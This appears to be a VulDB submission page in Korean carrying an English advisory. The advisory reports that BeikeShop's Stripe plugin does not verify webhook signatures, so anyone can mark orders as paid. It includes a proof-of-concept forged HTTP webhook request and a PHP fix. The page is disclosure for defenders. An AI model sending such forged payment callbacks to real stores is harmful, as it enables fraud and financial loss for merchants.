| 제목 | BeikeShop 1.6.0 Design/Logic Flaw |
|---|
| 설명 | 1. TITLE
BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass
2. PRODUCT
BeikeShop
3. VENDOR
BeikeShop / Guangda
4. VERSION
<= 1.6.0
5. CWE
CWE-347: Improper Verification of Cryptographic Signature
6. CVSS 3.1
7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
7. CATEGORY
Web Application / Payment Gateway
8. SUMMARY
The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment.
9. VULNERABLE CODE
File: `plugins/Stripe/Controllers/StripeController.php`
The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header.
10. PROOF OF CONCEPT
```http
POST /callback/stripe HTTP/1.1
Host: TARGET
Content-Type: application/json
{
"type":"charge.succeeded",
"data":{
"object":{
"metadata":{
"order_number":"KNOWN-ORDER-NUMBER"
}
}
}
}
```
Response:
```json
{"status":"success","message":"Capture Successfully"}
```
Result:
`orders.status` changes from `unpaid` to `paid`.
11. IMPACT
* Unauthorized order state manipulation
* Payment bypass
* Inventory deduction for unpaid orders
* Integrity impact on order and sales data
* Potential financial loss
12. SOLUTION
Implement Stripe webhook signature verification before processing webhook events:
```php
$payload = $request->getContent();
$sigHeader = $request->header('Stripe-Signature');
$secret = plugin_setting('stripe.webhook_secret');
$event = \Stripe\Webhook::constructEvent(
$payload,
$sigHeader,
$secret
);
```
Reject webhook requests when signature verification fails.
13. AUTHENTICATION
None required
14. USER INTERACTION
None required |
|---|
| 원천 | ⚠️ https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md |
|---|
| 사용자 | Fklov (UID 98102) |
|---|
| 제출 | 2026. 05. 16. AM 11:06 (24 날 ago) |
|---|
| 모더레이션 | 2026. 06. 07. AM 09:32 (22 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 369082 [Chengdu Everbrite Network Technology BeikeShop 까지 1.6.0.22 Stripe Plugin StripeController.php callback 요청 권한 상승] |
|---|
| 포인트들 | 20 |
|---|